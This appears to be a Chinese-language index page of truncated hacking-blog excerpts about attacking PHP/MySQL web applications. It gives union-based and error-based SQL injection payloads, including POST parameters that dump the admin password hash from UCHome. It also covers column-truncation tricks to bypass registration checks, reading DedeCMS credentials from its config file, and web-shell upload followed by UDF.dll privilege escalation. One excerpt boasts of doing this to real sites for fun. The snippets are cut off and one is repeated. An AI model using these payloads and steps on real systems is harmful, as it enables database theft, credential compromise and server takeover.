Mysql5+php 注入查看MYSQL基本信息(库名,版本,用户)
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/* 二.查数据库 and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*limit 从0开始递...
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/* 二.查数据库 and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*limit 从0开始递...
LengF:在看《PHP高级漏洞审核技术》认真的看了这两点,暂且记下。 对于很多web应用文件在很多功能是不容许重复数据的,比如用户注册功能等。一般的应用程序对于提交注册的username和数据库里已有的username对比是不是已经有重复数据,然而我们可以通过“数据截断”等来饶过这些判断,数据库在处理时候产生截断导致插入重复数据。 1) Mysql SQL Column Truncation V...
抽uchome两个老的SQL注入漏洞举例,漏洞很久以前就被人公布过了,两个SQL注入都在个人资料更新的流程里: 注册变量的代码KEY的内容直接进入了$inserts数组 foreach ($_POST['friend'] as $key => $value) { $value = intval($value); $inserts[] = "('base','$key','$sp...
通过前面SQL错误信息获得了表前缀,那么直接就可以爆用户名为admin的hash 向cp.php?ac=profile&op=info POST提交参数: profilesubmit=1&formhash=232d1c54&info[a',(select 1 from(select count(*),concat((SELECT concat(password) FROM ...
跨库爆出uckey,跨库到ucenter进行查询,这里我就不详叙了,都截图吧。 爆出数据库的个数 profilesubmit=1&formhash=232d1c54&info[a',(select 1 from(select count(*),concat((SELECT concat(substring(count(*),1,64)) F...
今天闲的无聊DEDECMS搞了几个站。没事做提权吧。真的很久很久没有玩这东西了。 测试经典的UDF.dll提权一次性成功。 dedecms的账号和密码都保存在data/common.inc.php里面;下载common.inc.php查看账号密码你懂的。 首先用菜刀上传UDF.php;然后输入账号密码啥的也就连接成功了。 作者: 二、适用场合:1.目标系统是Windows(Win2000,XP,W...